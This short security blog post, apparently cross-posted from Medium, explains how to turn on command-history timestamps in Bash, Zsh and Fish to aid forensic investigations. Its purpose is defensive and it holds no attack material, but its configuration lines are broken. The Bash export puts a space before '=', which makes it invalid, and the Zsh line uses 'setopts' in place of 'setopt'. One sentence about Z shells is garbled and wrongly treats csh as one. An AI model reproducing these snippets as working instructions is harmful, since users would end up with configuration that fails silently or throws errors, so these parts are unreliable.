loading...

Two-minute InfoSec — Shell History Timestamps

chapindb profile image Chapin Bryce Originally published at Medium on ・2 min read

Two-minute InfoSec — Shell History Timestamps

A new series with a goal on sharing quick wins that can assist organizational security, forensic investigations, incident response and more that you can implement within two minutes or less.

Photo by Kaitlyn Baker on Unsplash

Today’s post is focused on a a feature of nearly any shell — command history. This file is a rich source of evidence for prior user activity, especially on Linux/Unix/macOS systems. One major draw back is that by default, this file does not store timestamps, making analysis of the data difficult and cost a lot of valuable investigative time.

In this post we will cover how to quickly implement timestamps in some common shells including:

  • Bash
  • Zsh
  • Fish

Not all Linux/Unix/macOS platforms are made the same! These are general ways to accomplish this goal, but always test before putting things into production.

Bash

To add for user accounts, modify the ~/.bashrc or ~/.bash_profile files and add the below:

export HISTTIMEFORMAT ="%F %T %z "

This same line can be placed in /etc/bashrc to load across user profiles.

Source: https://linux.die.net/man/1/bash

Zsh

For user accounts, add the below line to ~/.zshrc or /etc/zshrc for system wide implementation.

setopts EXTENDED_HISTORY

This will not only place a timestamp of execution but also the duration of execution — a very handy data point in investigations! Some Z shells, such as csh, though it doesn’t hurt to check!

Source: http://zsh.sourceforge.net/Doc/Release/Options.html#Options

Fish

Enabled by default! Though check your history file is located at:

~/.local/share/fish/fish_history

Have another shell you use and prefer? Or maybe an alternative implementation on a specific OS? Comment and we can add it in to this post for ease of future reference!

Posted on Mar 5 by:

chapindb profile

Chapin Bryce

@chapindb

Digital Forensics ⚡Incident Response Professional, Ski Bum, Author of Learning Python for Forensics and Python Forensics Cookbook

Discussion

markdown guide